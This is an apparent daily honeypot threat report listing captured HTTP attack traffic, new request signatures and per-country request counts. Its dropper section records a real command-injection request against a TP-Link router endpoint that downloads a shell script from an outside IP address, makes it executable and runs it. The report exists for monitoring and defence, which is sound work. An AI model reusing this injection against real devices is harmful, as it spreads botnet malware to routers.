Skip to main content
  1. Daily-Posts/

Report: 2025-05-05

·284 words·
Repport Daily
Author
Shoggoth Industries
Table of Contents

Daily Report: 2025-05-05
#

Executive summary
#

interaction report on http service of various Hhoneypot around the world.

executive_summary
#

In today’s repport, we detected 1 stage 1 IP address(es), linked to 1 dropper URL(s).

There are 4 new requests that have never been observed before (these were added to the monitored request database.).

A total of 1463 requests were recorded during the day, originating from 1 different countries, with a peak of 318 requests coming from BG.

ot_simplified_report
#

simplified report for medium-level interactions with honeypots that mimic industrial systems (web site loading, or interactions with the website), for more contact us on social@shoggoth.industries.

source_countrytargeted_country
USDubai

botnet_dropper_behaviour
#

remote_addrrequest
45.95.147.209GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60cd+%2Ftmp%3B+rm+-rf+sh%3B+wget+http%3A%2F%2F176.65.148.234%2Fsh%3B+chmod+777+sh%3B+.%2Fsh+tplink%3B+rm+-rf+sh%60) HTTP/1.1

request
#

The list of requests presented here are those that have not yet been yet integrated into the request database.

number_of_occurencerequest
3191\x00\x00\x00\xE0Z\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x05\x01=K\x00\x00\x01\x01\x11\x08\xA8\xC0\xD8C\xAEC\x95x/\x00admin\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x000\x81\x89\x02\x81\x81\x00\xCF2\x93u-\x97\x90\xA5Bm\xD6M\xBD\x7F\x15\x93\xE9\xB6\xA1\xADp\x14\x89\x1D\x09G\xE2’\x92%i+;\xC6}\xFD\xF6\xFD\xAD\x98\x81\x8Fg\x18\x19i)\xCF\x80}T\x22gK\xF3X\xAC\xBD\xC9\xB5w\x9A\xE1\x08\xD1\x907\xAFGY\x80\xD9\xE7p\xEA;
3251\x00\x00\x00\xE0Z\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x05\x01=K\x00\x00\x01\x01\x11\x08\xA8\xC0\xD8C\xAEC\x95x/\x00admin\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x000\x81\x89\x02\x81\x81\x00\xB6\x8A\x91\xE6\xA6\x09\xED\x837\xCAd’\xE6\xA7\xA4\xF0\x1BR
3291\x00\x00\x00\xE0Z\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x05\x01=K\x00\x00\x01\x01\x11\x08\xA8\xC0\xD8C\xAEC\x95x/\x00admin\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x000\x81\x89\x02\x81\x81\x00\xB4’\x0CS!$\x0C\xEC\x0Cz\x15\x87\x1C\xE8f\x0ELc\xC6k\x8Ax\xFDLD\xC5+\x01\x90\xFE\xF5@\xD7\x86N\xEA\xB3\x00\x1D\xC2`\xAC.\xBB,\xCE+\xC9E\x0Cq\x95\xD8=\x91\x869\xDB.\x81V\xC4jPgz\xC7\x9A\xA3\x08\xE4\x8Esb\xD1SV\x07\x8F\x1B\x81\x9D\x05\xCD\xD3\x9D_?\x08.IK\xF2F\x05\x88L\x03\xFE\x1C\x8A\xE1\x00/\xA8\x03\x1F\xFAW\x91o=h\xBB\xA0q\x05\x81/\xB9}r\x9E\xA4\xB6;\xE6\x85\x02\x03\x01\x00\x01
3331\xA0\x05\x00`\x00\x00\x00\x00\xC4\xA3\xAFH\x99V\xB6\xB4\xC4\xA3\xAFH\x99V\xB6\xB4\x05\x02\x00\x01\x00\x00\xA1\xAA

country_iso_code
#

number_of_occurencecountry_iso_code
0318BG
1308NL
2188US
3109DE
4100CN
587GB
661FR
749VN
848IN
942PL
1033SC
1115KR
1212PT
1312AZ
148CZ
158AO
167TR
177UA
186BE
194CH
204SG
214LT
224AE
234CA
244GH
254SA
263HU
272RU
282HK
292ID
301IT
311IR
321JP
331RO
341NZ
351MC
361TH
371EE

Related

Report: 2025-05-04
·471 words
Repport Daily
Report: 2025-05-03
·440 words
Repport Daily
Report: 2025-05-02
·307 words
Repport Daily